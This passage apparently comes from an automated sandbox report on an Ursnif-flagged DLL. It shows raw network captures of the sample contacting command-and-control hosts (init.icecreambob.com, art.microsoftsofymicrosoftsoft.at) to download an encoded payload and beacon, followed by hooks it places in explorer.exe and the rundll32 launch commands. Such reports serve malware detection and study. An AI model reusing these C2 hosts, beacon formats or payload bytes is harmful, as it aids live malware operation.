29 f8 1d a7 cf ea f1 65 2c fb d1 7b 1b 99 dc 1f a1 92 94 e0 9f 2e 1f 73 9a 09 ec 97 d3 b9 54 3a bc c5 fc ae 1a 79 b6 1a e4 af 43 fb 97 b7 62 0e cb 4b 14 a1 b0 a5 74 
fc a7 63 7d c2 f9 b6 68 4d 59 8d eb b1 0f b5 17 02 ba 96 5e 34 ef 0b 4f 58 41 df 52 dc d3 dd 0d 3c 4d b7 8a 5e ef a8 68 f6 63 fa bc 0e a9 17 cc 52 c8 42 23 52 be 42 c8 f3 87 81 bf b7 a7 5c 20 aa 58 42 97 0f 38 03 75 1c 52 6d 8f e9 c5 9d 00 8d 13 a7 dc 93 b8 42 86 d3 c5 04 a4 4a df a8 26 c7 39 29 23 0e 15 b8 79 47 43 32 5b 81 a8 ff c8 d9 2e b3 df f0 cb 97 18 5b 41 9a f6 ce 81 9d ea 6a 11 14 4d 90 00 a7 44 61 a9 ac 2f 2a 2d eb 89 9d dd 83 71 6a 05 02 72 0e be 3e 80 92 66 63 2e 7d 94 12 9d 40 2b 53 0e f5 fa df aa f5 8c 3b ef d6 85 15 55 88 e0 0e 69 e6 53 ee 3f b5 19 88 c0 b0 8a 99 ad 63 f3 63 b0 04 86 4c 29 60 d3 e2 21 ce e6 15 22 95 b1 36 9f 81 58 74 cc 11 62 4a 66 07 8c 8e e3 e3 ae 72 1f 41 cb c9 a2 63 e7 66 52 97 00 78 d5 8c 0e 33 8b 58 2b 2a ee a0 32 00 8f 21 ff 18 d4 92 0c 0a ce 22 ea 1e dc 7c c6 cf 90 bb ec 64 61 bb
                                                          Data Ascii: VG9iG.`hx#@Z`5"+<}3C;i3(NSo#4\GR\nkq6yDwI*LG8N t|#qa_.lwt8c`-R-\U=}~)2UzeO.!h~ZZdw+PMlz|0x+Hj89F,7_.p(Lg!_Zl|_9s\qoPr[AMGN?|\FfR/k:.qd$\pI(<-WAi}DFhB3*;v(L"zZb%_7W/_plVn\n^*afnry{IP%^E=Vv<Yh/PvmA0X]~q-)e,{.sT:yCbKtc}hMY^4OXAR<M^hcRB#RB\ XB8uRmBJ&9)#yGC2[.[AjMDa/*-qjr>fc.}@+S;UiS?ccL)`!"6XtbJfrAcfRx3X+*2!"|da
                                                          Oct 7, 2021 01:32:21.292890072 CEST2266INData Raw: e3 3c 24 a4 3d 22 2c 2e 83 f8 e6 8e 9e c0 04 5e b8 17 0d 39 14 b4 6e e2 07 92 b1 ff f7 ff 8e 9f d3 cb 01 09 1a c7 57 f6 2e ba a7 6f 9f 56 fa ec 6b 8c 57 5c 5d 4b 97 d8 4a ca 14 20 fa 24 a6 bf d0 95 7e 10 05 74 0a 32 23 e8 11 ee 42 c8 30 50 5a ed
                                                          Data Ascii: <$=",.^9nW.oVkW\]KJ $~t2#B0PZe,3!CbWF+15[2">!QUqVRs+f_:>>W%>upq<)IW'LQ]^<QO23'S~?+vR9?@8aLsGlYn3


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          4          | 192.168.2.4 | 49780       | 194.147.86.221 | 80               | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:32:20.886424065 CEST | 2264 | OUT | GET /2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:21.568727970 CEST | 2268 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:21 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 247962
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e320583a02.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 4b 63 5e 38 66 50 d7 31 63 15 5b 39 38 df 50 31 0b 84 05 64 b8 37 51 dd f3 b6 04 c3 16 22 71 14 38 f4 7d b3 44 05 f2 d2 3f 2e 23 27 ff 54 f2 df 8f 4d d1 03 cb 39 22 a7 a0 d6 cf 33 d2 20 69 a7 48 95 51 bb d7 73 af 02 c4 2e c3 eb c8 bd ef 00 ff 65 01 f5 dd 52 c4 15 ba ea 88 99 1e 91 2e 0a c6 42 c0 f8 97 03 9a df 4e 4a fa 1b f1 ab 5d 10 93 0f f1 0b 1b 86 bb 17 2f d8 28 81 d4 bc 33 93 47 c4 d6 b2 46 34 1f b7 95 87 78 ed 5d f1 35 62 a5 7c 49 84 c1 10 21 38 d4 fd a3 9e 7d 2e 8e 56 98 0f ec 30 57 09 0c 01 41 9d 5a b6 de 60 48 26 96 48 42 27 4a a5 80 7f 62 17 fd e2 13 c2 c5 ab 43 a2 f5 2f ad c1 99 58 17 18 a2 3d 52 4f fe 1e ec 29 04 3a e2 7a 26 af 18 24 7a cb de 04 e8 6c 49 05 27 68 d5 78 23 74 2f 0e f9 9e 7e 7f 80 6c 92 24 5f 91 91 0a 48 88 f4 cb 7a dc 12 db 2b 81 11 63 4b ff 15 1c 02 38 d7 b9 b7 2f 84 39 7d f3 6a 4c c0 9b 4a 4d b3 ea 3a 77 d5 8b 93 76 d2 9b 6a 5f 9a 72 d6 56 36 87 03 f4 7c 2a 2f ee 3d 17 74 68 aa 4f d5 c2 df 2d fd ad 9b 32 83 86 20 57 52 11 8c 76 3e 49 2f 9e 49 9a 22 8f 89 17 c8 63 9d bb 90 b5 98 cf 9b 6e 42 e4 b9 b5 bf e6 c7 ec 82 b5 a3 62 a8 a1 10 5b bf 23 02 d1 e7 5c 28 c0 bf 9a f2 ec b8 32 e8 67 87 21 4d cf 7d d2 40 01 0d 17 67 0a 6c 3a 98 bb 13 1f 2c 6c b8 bb 0a de 2a b6 61 d2 fe e3 7d 87 f2 12 a3 8a a1 ac 11 c1 db d5 4c fb 43 98 2a 61 20 4d 94 9c 4d e1 70 56 c5 ac 2b 38 2b b9 2c 8c 98 9d e7 24 c5 e9 18 ab 45 3c e8 29 f8 78 52 d9 f9 71 4a fb ac a5 0e 8c 86 92 01 b1 3e 4c bc 66 9d 84 a0 9c cd 17 e7 3c 16 f2 65 49 50 77 e2 e1 3f 21 6c 31 54 ae a1 f8 e1 4f f6 53 2b 93 b5 02 af 5b 56 3b bf b7 c0 1d 67 da 32 af ee d7 00 dc 05 76 aa b1 8b d2 2b e2 91 fc f8 30 30 0b b0 4b 24 32 18 c0 8b cb 29 ba 69 2f 09 99 6e 4d 5b 1a b7 02 5b ac 62 64 d7 ea ed 1f 5b 68 5d 14 2d f5 03 c4 a8 bf 30 cf 56 29 e9 d4 d7 60 48 2a 99 02 86 80 6a 59 46 42 80 ed 26 f7 3f 49 0f 3d 94 db e5 db 40 9c d2 ff 8f 7c 1c 29 ec 56 ee a5 2d 42 32 15 a1 a2 62 a1 32 ee 09 b8 e6 7f 66 84 54 be 2e 0c 21 03 8f 94 27 ff 29 96 ce e3 
a5 09 75 c1 33 0f fb 23 85 33 2c dd cd 8c 5c 72 a0 84 29 4f c0 b7 5f 77 3f 79 ca 9b a4 8d 0d f7 ca fc 5a 69 ea b1 a9 1d e9 74 60 1b b5 29 e2 24 03 cf b1 6f 5a db b7 48 92 cd f2 fd 8c b9 ce f7 cc 4f 60 03 94 af 86 ab e0 6e bb 16 e6 7f 86 b9 e0 7d ea ed a9 68 a5 a9 ba 8d 73 f5 eb c8 1c 92 4a dd e7 19 31 5f 38 ad db ce f3 ac 7a b2 b5 fe 0a ac e0 41 ec a1 af db 28 94 94 bc 7a c1 ee 19 d3 e4 07 2f a4 68 b7 a3 21 27 b5 62 67 5e 86 79 37 b7 ca 06 9a 89 45 83 98 c8 46 18 d8 74 9b c8 4b ae ef c2 93 32 68 07 14 1a a2 5f 1f 75 76 bb 64 e1 da f2 37 dc 72 1a 13 f5 38 4a ad d5 8b 22 30 d4 8f 94 60 1d 25 e0 dc 31 04 db d5 f8 b3 94 df 0f 4a 60 19 57 bc c4 a3 89 84 04 a6 78 d7 8c 0a 99 e1 be 0b c5 d2 2b 81 da 20 69 2d 8d 72 c2 42 25 d8 21 6e a3 27 05 7f 44 cd 15 98 e1 9b 1b 3c 07 1e f1 1b ce fc ec 5d fb 78 b3 66 7a ca 83 1d a3 61
                                                          Data Ascii: Kc^8fP1c[98P1d7Q"q8}D?.#'TM9"3 iHQs.eR.BNJ]/(3GF4x]5b|I!8}.V0WAZ`H&HB'JbC/X=RO):z&$zlI'hx#t/~l$_Hz+cK8/9}jLJM:wvj_rV6|*/=thO-2 WRv>I/I"cnBb[#\(2g!M}@gl:,l*a}LC*a MMpV+8+,$E<)xRqJ>Lf<eIPw?!l1TOS+[V;g2v+00K$2)i/nM[[bd[h]-0V)`H*jYFB&?I=@|)V-B2b2fT.!')u3#3,\r)O_w?yZit`)$oZHO`n}hsJ1_8zA(z/h!'bg^y7EFtK2h_uvd7r8J"0`%1J`Wx+ i-rB%!n'D<]xfza
                                                          Oct 7, 2021 01:32:21.568784952 CEST2269INData Raw: 48 57 a9 2f 4c a2 4c 07 a3 1c 0f 34 9e a5 7a 23 91 f3 40 11 49 37 98 44 60 59 20 08 3d 94 df aa 6d 3b 7c f7 f7 89 91 f9 f1 f8 02 a8 c2 7c f4 d7 51 a4 cd 5e d0 e3 0b a4 17 ed 15 e5 93 70 53 b8 3d 71 04 2d 5f 39 37 24 85 22 cf 75 7e 96 87 dd 4f c3
                                                          Data Ascii: HW/LL4z#@I7D`Y =m;||Q^pS=q-_97$"u~OuhhqN N1tt.<n*(cY=`"DAi(%80X\m[bW+AC5*O/QXYb52'hKi:)l,-<P; b7BxXK|
                                                          Oct 7, 2021 01:32:21.568821907 CEST2270INData Raw: f2 80 cf 6d a8 ee f3 d2 ba 7c b3 24 3d 68 9a 82 2a 60 85 2f dc 11 f3 d3 53 ff cf 00 22 25 84 f9 25 54 51 bc 26 8a e6 16 82 c7 02 c2 f9 7c 30 8d 61 26 49 dd 0b 63 d3 f4 93 5e 67 94 0c c9 eb cf ab 72 26 07 fb 74 0e 66 1e f1 ee 28 c6 fc 13 19 4b 97
                                                          Data Ascii: m|$=h*`/S"%%TQ&|0a&Ic^gr&tf(KI#wK%uF>S"P[kD8,{)0S;CYA7r"Jx[Rhz\2Fpw8s,xgv<w.m= FFNjdNT,du$b{V
                                                          Oct 7, 2021 01:32:21.568861008 CEST2272INData Raw: f7 a9 67 36 b4 35 60 67 f6 b3 db 15 02 ca ef 82 02 39 86 36 eb 97 f4 19 b3 df ac 62 79 69 23 ae 4c 1c d9 f8 27 40 b4 ca 71 24 2b 94 ca bd 11 6b f7 10 a9 57 cb 80 17 85 45 f2 c2 97 d6 60 b4 9f da ef 9d 19 ca 58 d9 3f f3 af c7 a0 08 d3 ed f8 a6 ce
                                                          Data Ascii: g65`g96byi#L'@q$+kWE`X?VCI` 0U[U;5;S*7W(I pt*G/-[/B4,(W%HG||8hBuK{^m~o:n\70hGUu!J
                                                          Oct 7, 2021 01:32:21.568897009 CEST2273INData Raw: 1f a2 bb 51 3b 3b fc 03 f3 ac d4 b2 e7 2c 28 a1 18 08 b3 40 1a fb 48 43 76 af 34 5d 1f 25 c1 ed 85 84 e5 2a 1f ca d1 1d 78 84 e8 b3 e4 39 8f c5 cc fd 7f 5c 44 6f d0 96 b3 d9 0a 77 fd bb 0d 18 7c 91 b3 ff a9 e8 20 77 65 62 39 86 d3 d1 13 a1 a1 5e
                                                          Data Ascii: Q;;,(@HCv4]%*x9\Dow| web9^knwi3=*)CN"/.#l$|~0|LV0H..UgMA P29N=w|<7}vBR
                                                          Oct 7, 2021 01:32:21.568938971 CEST2275INData Raw: 72 1f ff f6 60 fd f7 af fb b2 94 3f 3f fe 24 83 55 06 5d d1 16 b2 14 fe e2 a8 f5 b7 f9 fa 35 c2 01 b5 da ed d8 e6 e3 fd 5b f2 04 7c 81 bc 81 8f 4c 4e fe 08 7a d9 e1 b6 f8 58 54 db c0 9d 4d 10 7e 6d ed d4 81 d8 ae 8c 91 d4 5f 2d e0 20 d7 89 6c a9
                                                          Data Ascii: r`??$U]5[|LNzXTM~m_- lg>X!?Q{b~Dz/Zu'.X+&n/ }|E&sa?^EPNyv=Jj{89snvU"VC!36
                                                          Oct 7, 2021 01:32:21.568977118 CEST2276INData Raw: 5f 8e fc e9 8a 59 e6 f4 27 6c f8 76 c5 36 39 7a e2 d8 88 b4 a0 1c bf 59 4e 8e 99 c9 bb 4c 21 b9 be a7 0f 58 db ad ab 31 7d 59 71 00 03 51 64 80 bf 22 d9 ab e8 a6 8c b6 2f 84 a8 b6 16 ab 80 b8 05 dd 47 57 d8 29 65 19 1a d1 a6 f1 77 68 e9 73 4c a9
                                                          Data Ascii: _Y'lv69zYNL!X1}YqQd"/GW)ewhsL"^?9?mvV(d)0Rpm7?'deTy4MlbLuU4h4`-[~m]P^k{':lUQSf/v
                                                          Oct 7, 2021 01:32:21.569017887 CEST2277INData Raw: a1 1d 28 79 3f d3 2e 2b c8 94 cf 20 0a d3 cd 6f 3c 27 bf 06 32 a4 de 26 68 b0 a2 48 df 2e 1c e7 63 5f 3f 81 6b e3 e4 19 64 74 88 18 4b af 22 52 c2 20 22 a5 f2 fb a1 75 4c cd 59 19 04 95 dd 6f e6 4b 5a ce 69 1f f7 3b 78 40 97 50 13 0c 3f 3d f2 1e
                                                          Data Ascii: (y?.+ o<'2&hH.c_?kdtK"R "uLYoKZi;x@P?=(6#+~3~q-^Ke!)F="vM!Ly(BK%SMj;=V+k@*^r4I??StUey#ggZFAc9t&rEI
                                                          Oct 7, 2021 01:32:21.569056988 CEST2279INData Raw: 3f aa 73 11 0d 57 14 b7 16 27 e9 b5 75 1c 37 e0 3d 9f 68 cd d4 5b e3 4a 31 ea 34 d5 4b 4e 34 a2 06 46 ea 52 44 df 5b f3 97 aa 9a 2f 92 4c c6 4e 3b ba f4 38 30 e3 cb 30 12 7e b3 d4 4b 54 6f 34 70 7e 90 94 76 cf 46 44 91 41 c0 d1 f6 42 61 c9 10 b3
                                                          Data Ascii: ?sW'u7=h[J14KN4FRD[/LN;800~KTo4p~vFDABa*cL(]D=A=p(j%v/hkvvKB^<s0:sNDg9e?ddIT}PA %gXr7(/IH[E!EdT]O"
                                                          Oct 7, 2021 01:32:21.569092989 CEST2280INData Raw: 1a 93 14 95 99 66 8e c9 d5 22 0f 0f 14 4f 08 4d 3b 95 ee 45 02 bd c4 96 f0 c3 a3 89 d8 32 21 6a ae 05 b7 1b 73 76 b7 a5 b5 12 e1 d6 bb 59 bb 7a be 71 fa f8 1e 35 4d d3 9c 92 d6 32 df e2 9c b4 24 c1 27 d4 68 b5 c7 e0 93 fe 73 cb 0a 76 72 53 61 4b
                                                          Data Ascii: f"OM;E2!jsvYzq5M2$'hsvrSaKXmcgPlL'9'"zDk"h5IA>!'6Qn =ds5}`VOts;{Mb|b7B?@QKfZbR0H1w.Ao08|*we >6^
                                                          Oct 7, 2021 01:32:21.618634939 CEST2282INData Raw: c4 6b 40 13 06 45 0a 3d 48 54 79 ff 92 84 a6 e6 01 d5 f4 11 74 8f 47 cd db d7 f7 26 22 2c a4 68 a4 29 14 96 6b 20 15 b5 ba 29 2a 95 a0 63 56 67 a6 e9 65 d2 c1 c4 b5 ad 73 3f 8a b5 1e 10 4e 99 43 a8 51 ee d5 aa 8f a8 52 10 fd 44 45 12 79 f5 9e 1f
                                                          Data Ascii: k@E=HTytG&",h)k )*cVges?NCQRDEy$,7:O Pq+U'/s*\|v$cP7xg.eH$%B2%bj]qZUEGzCEF@9J18GaapL9}NPD^az?0?P:


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          5          | 192.168.2.4 | 49781       | 194.147.86.221 | 80               | C:\Windows\System32\loaddll32.exe
                                                          Timestamp | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:32:23.671128988 CEST | 2525 | OUT | GET /zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: init.icecreambob.com
                                                          Oct 7, 2021 01:32:24.126127005 CEST | 2527 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:32:24 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 1967
                                                          Connection: close
                                                          Pragma: public
                                                          Accept-Ranges: bytes
                                                          Expires: 0
                                                          Cache-Control: must-revalidate, post-check=0, pre-check=0
                                                          Content-Disposition: inline; filename="615e3208164af.bin"
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          6          | 192.168.2.4 | 49862       | 194.147.86.221 | 80               | C:\Windows\System32\loaddll32.exe
                                                          Timestamp                           | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:34:00.834180117 CEST | 10309              | OUT       | GET /F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:01.322679043 CEST | 10310              | IN        | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                          X-Content-Type-Options: nosniff
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                                          7          | 192.168.2.4 | 49863       | 194.147.86.221 | 80               | C:\Windows\System32\loaddll32.exe
                                                          Timestamp                           | kBytes transferred | Direction | Data
                                                          Oct 7, 2021 01:34:10.121752024 CEST | 10311              | OUT       | POST /oFicZj5usGm_2B0NL9gZLV/ZUmxvOk6Hl7SJ/EDK5fPOS/8bJn0oEKBXyaI_2FgFLHjIr/vR9EgPr9iZ/BsHMBlv9QxRTJNREz/mACP3yGg7skY/_2FdZEJn_2F/IV2mBc0GG_2FvT/53lPOvidBB1fn_2FI5kxG/suo5_2BB8niHf2Ry/rgnjnl9X_2F6HZr/tIOdn9dPOC7f1v8Cp_/2FP4dNfA6/YXJeUCPB5E1QadP6XZ0Z/70c_2FO_2BuW1MJ1FGY/r27cnguDBgf94rw_2FDi4i/aJyUeDcmN8xPq/7e51fVNw/PYHU8eZ8MJvwfaAYDz_2Fvf/Qi7bVln3AU/Hyoo0rU5uWfSrP9FI8hAt/b HTTP/1.1
                                                          Cache-Control: no-cache
                                                          Connection: Keep-Alive
                                                          Pragma: no-cache
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
                                                          Content-Length: 2
                                                          Host: art.microsoftsofymicrosoftsoft.at
                                                          Oct 7, 2021 01:34:10.121759892 CEST | 10311              | OUT       | Data Raw: 0d 0a
                                                          Data Ascii:
                                                          Oct 7, 2021 01:34:10.640894890 CEST | 10311              | IN        | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Wed, 06 Oct 2021 23:34:10 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Content-Length: 146
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Code Manipulations

                                                          User Modules

                                                          Hook Summary

                                                          Function Name                                               | Hook Type | Active in Processes
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW    | IAT       | explorer.exe
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW            | IAT       | explorer.exe
                                                          CreateProcessAsUserW                                        | EAT       | explorer.exe
                                                          CreateProcessAsUserW                                        | INLINE    | explorer.exe
                                                          CreateProcessW                                              | EAT       | explorer.exe
                                                          CreateProcessW                                              | INLINE    | explorer.exe
                                                          CreateProcessA                                              | EAT       | explorer.exe
                                                          CreateProcessA                                              | INLINE    | explorer.exe

                                                          Processes

                                                          Process: explorer.exe, Module: user32.dll
                                                          Function Name                                               | Hook Type | New Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW    | IAT       | 7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW            | IAT       | 6BEF6FC
                                                          Process: explorer.exe, Module: KERNEL32.DLL
                                                          Function Name                                               | Hook Type | New Data
                                                          CreateProcessAsUserW                                        | EAT       | 7FFABB03521C
                                                          CreateProcessAsUserW                                        | INLINE    | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessW                                              | EAT       | 7FFABB035200
                                                          CreateProcessW                                              | INLINE    | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          CreateProcessA                                              | EAT       | 7FFABB03520E
                                                          CreateProcessA                                              | INLINE    | 0xFF 0xF2 0x25 0x50 0x00 0x00
                                                          Process: explorer.exe, Module: WININET.dll
                                                          Function Name                                               | Hook Type | New Data
                                                          api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW    | IAT       | 7FFABB035200
                                                          api-ms-win-core-registry-l1-1-0.dll:RegGetValueW            | IAT       | 6BEF6FC

                                                          Statistics

                                                          CPU Usage

                                                          Memory Usage

                                                          High Level Behavior Distribution

                                                          Behavior

                                                          System Behavior

                                                          General

                                                          Start time:01:30:58
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\loaddll32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\data.dll'
                                                          Imagebase:0xc70000
                                                          File size:893440 bytes
                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          General

                                                          Start time:01:30:59
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
